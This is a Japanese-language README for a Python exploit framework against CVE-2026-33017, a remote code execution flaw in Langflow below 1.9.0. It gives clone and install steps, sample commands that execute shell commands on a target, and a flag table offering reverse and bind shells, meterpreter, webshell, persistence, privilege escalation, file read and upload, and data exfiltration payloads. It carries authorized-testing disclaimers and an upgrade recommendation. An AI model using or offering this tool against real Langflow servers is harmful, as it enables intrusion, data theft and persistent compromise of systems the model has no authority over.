
CVE-2026-33017 は Langflow <1.9.0 向けの悪用ツールです。リバースシェル、コマンド実行、ファイル操作、永続化、自動テストを備えています。重大な RCE 脆弱性の影響を検証します。許可されたセキュリティ評価のみを対象としています。
CVE-2026-33017 · Langflow リモートコード実行のための認可済みセキュリティテスト
リサーチ&レッドチームツール — 明示的に評価を許可されたLangflowインスタンスに対するCVE-2026-33017の検証用です。許可のない使用は禁止されています。
このプロジェクトは以下の目的専用です:
許可なくコンピュータシステムへアクセスすることは違法です。 対象をテストする前に、適用法規を遵守し、書面による許可を得る責任はすべてあなたにあります。作者は誤用に対して一切の責任を負いません。
CVE-2026-33017 の影響を受ける可能性があるLangflowデプロイメントを評価するための非同期Pythonフレームワークです。脆弱性チェック、ペイロードモード選択、自動評価実行、エンゲージメント文書化のための構造化レポートをサポートします。
--check-only モード--auto / バッチ指向の実行httpx ベースで設定可能なロギングを搭載flow-id と client-idgit clone https://github.com/CerberusMrXi/Langflow-cve-2026-33017-exploit
cd Langflow-cve-2026-33017-exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
--check-only
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "id"
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "uname -a" \
--report markdown \
--output-file report.md
python exploit.py -u URL -f FLOW_ID -c CLIENT_ID [options]
| フラグ | 説明 |
|---|
.
├── exploit.py # メインCLI&評価エンジン
├── requirements.txt # Python依存関係
├── README.md # このファイル
└── venv/ # ローカル仮想環境(バージョン管理対象外)
対象がCVE-2026-33017に対して脆弱な場合:
--check-only を再実行してパッチを検証する--check-only を優先する信頼性、レポート、検出精度、防御的ドキュメントの向上につながる貢献を歓迎します。変更内容とラボ環境での検証方法を明確に説明した Issue または Pull Request を開いてください。
認可されたセキュリティテストおよび教育目的の研究のみを目的として提供されます。
保証はありません。自己責任かつ法律を遵守して使用してください。
Sudeepa Wanigarathna
認可されたセキュリティ調査用 · CVE-2026-33017
| 項目 | 詳細 |
|---|
| CVE | CVE-2026-33017 |
| 対象 | Langflow |
| 推奨される緩和策 | Langflow 1.9.0以上 にアップグレード |
| 言語 | Python 3.10+ |
| バージョン | 1.0.0 |
| 作者 | Sudeepa Wanigarathna |
-u, --url | 対象のベースURL(例: http://127.0.0.1:7860) |
-f, --flow-id | LangflowフローID |
-c, --client-id | クライアントIDクッキー値 |
| フラグ | 説明 |
|---|
-t, --payload-type | reverse_shell、bind_shell、command_exec、file_read、file_upload、persistence、priv_esc、data_exfil、meterpreter、webshell、all(デフォルト: reverse_shell) |
-l, --lhost | リスナーホスト(省略時は該当する場合に自動検出) |
-p, --lport | リスナーポート(シェル / meterpreterモードでは必須) |
--cmd | コマンド文字列(command_exec) |
--file-path | ファイル読み取り / アップロードモードのパス |
--file-data | アップロード内容(file_upload) |
| フラグ | 説明 |
|---|
--auto | 自動化されたエクスプロイトワークフロー |
--check-only | 脆弱性チェックのみ |
--batch | バッチモード |
--report | text | json | html | markdown |
--output-file | レポート / 出力をファイルに書き込む |
-v, --verbose | 詳細なロギング |
-q, --quiet | エラーのみ表示 |